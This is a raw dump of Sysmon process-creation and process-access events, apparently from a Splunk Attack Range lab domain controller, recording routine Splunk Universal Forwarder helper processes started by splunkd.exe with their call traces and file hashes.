Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000031431Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:09.402{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-570D-6008-1F07-00000000A301}7200C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000031430Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:09.402{7901BC46-570D-6008-1F07-00000000A301}7200C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000031456Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:10.902{7901BC46-570E-6008-2107-00000000A301}64484644C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031455Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:10.746{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-570E-6008-2107-00000000A301}6448C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031454Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:10.746{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031453Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:10.746{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031452Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:10.746{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031451Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:10.746{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031450Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:10.746{7901BC46-4984-6008-0500-00000000A301}640656C:\Windows\system32\csrss.exe{7901BC46-570E-6008-2107-00000000A301}6448C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000031449Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:10.746{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-570E-6008-2107-00000000A301}6448C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000031448Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:10.746{7901BC46-570E-6008-2107-00000000A301}6448C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000031447Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:10.214{7901BC46-570E-6008-2007-00000000A301}73524360C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031446Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:10.074{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-570E-6008-2007-00000000A301}7352C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031445Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:10.074{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031444Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:10.074{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031443Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:10.074{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031442Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:10.074{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031441Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:10.074{7901BC46-4984-6008-0500-00000000A301}640656C:\Windows\system32\csrss.exe{7901BC46-570E-6008-2007-00000000A301}7352C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000031440Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:10.074{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-570E-6008-2007-00000000A301}7352C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000031439Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:10.074{7901BC46-570E-6008-2007-00000000A301}7352C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000031464Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:11.417{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-570F-6008-2207-00000000A301}5516C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031463Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:11.417{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031462Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:11.417{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031461Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:11.417{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031460Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:11.417{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031459Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:11.417{7901BC46-4984-6008-0500-00000000A301}6401076C:\Windows\system32\csrss.exe{7901BC46-570F-6008-2207-00000000A301}5516C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000031458Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:11.417{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-570F-6008-2207-00000000A301}5516C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000031457Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:11.418{7901BC46-570F-6008-2207-00000000A301}5516C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000784472Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 